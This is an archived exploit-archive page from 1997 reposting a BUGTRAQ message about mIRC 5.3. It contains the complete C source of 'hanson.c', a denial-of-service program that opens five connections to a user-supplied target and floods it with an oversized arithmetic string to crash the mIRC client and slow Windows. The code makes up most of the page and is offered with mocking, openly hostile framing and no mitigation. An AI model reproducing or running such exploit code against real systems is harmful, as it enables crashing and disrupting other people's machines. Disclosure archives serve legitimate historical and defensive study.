mIRC crash via new socket feature

Summary
Description:A problem with the way mIRC handles bound sockets allows mean people to crash the mIRC clients of poor, defenseless Windows users.
Author:Derek Reynolds <startnet@NATION.ORG>
Compromise:Crash an mIRC user and make thier Windows run even slower than usual
Vulnerable Systems:Those running mIRC 5.3 under Windows
Date:7 December 1997
Details


Date: Sun, 7 Dec 1997 21:21:46 -0500
From: Derek Reynolds <startnet@NATION.ORG>
To: BUGTRAQ@NETSPACE.ORG

Hi, The past week many people have downloaded the long awaited mIRC 5.3 and
have done many nice things with it in the way of socket scripting..

Below is a program that will exploit mIRC's new socket feature and crash the
client and make the windows95/NT environment run very very slow (Pentium
will now be sluggish as a 286). By the way, I have ported the src to win32
binary executable which works aswell.

I would like to address the author of mIRC (Khaled) : Maybe you should add
me to your beta list.. hehe.


keep it real

myn@efnet

------- hanson.c ------------


  [ Part 2: "Attached Text" ]

/*  hanson.c - by myn with help from h2o and watcher *thanks*

    This lil program exploits mIRC's bound sockets, making the client crash

    mIRC can handle a mass influx of data but cannot handle strings of data
    that are parsed internally through mIRC. This program forces mIRC to
    parse incoming data and identify it, the result from the parse
    is larger then mIRC's buffer string size, thus making the
    client crash :).  This will create 5 connections to the bound port and
    then send the string.

    Its like sending double "int" when you only had 1 bit to work with!

    hanson.c is dedicated to all the lil 13 to 16 year old geeks (abyss)
    that are in love with those cute boys..


          myn@efnet
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>


int x, s, i, p, dport;
/* SET STRING HERE */
char *str = "9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 * 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999";
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;


int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;
     bzero((char *)&blah,sizeof(blah));
     blah.sin_family=AF_INET;
     blah.sin_addr.s_addr=inet_addr(server);
     blah.sin_port=htons(port);

    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
           perror("gethostbyname()");
           return(-3);
         }
    }

        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
             perror("connect()");
             close(sock);
             return(-4);
        }
        printf("     Connected to [%s:%d].\n",server,port);
        return;
}


void main(int argc, char *argv[]) {
     int t;
     if (argc != 3) {
       printf("hanson.c - myn@efnet\n\n");
       printf("This lil program exploits mIRC's bound sockets, making the client crash\n\n");
       printf("Usage: %s <target> <port>\n",argv[0]);
       exit(0);
     }
     printf("hanson.c - myn@efnet\n\n");
     for (t=0; t<5; t++)
     {
     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }
     p = atoi(argv[2]);
     open_sock(s,argv[1],p);

     printf("     Sending string 1ooo times to %s port %i... \n", argv[1], p);

     for (i=0; i<1000; i++) {
       send(s,str,strlen(str),0x0);
     }
     printf("mmmmb0p.\n");
     }
     close(s);
}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault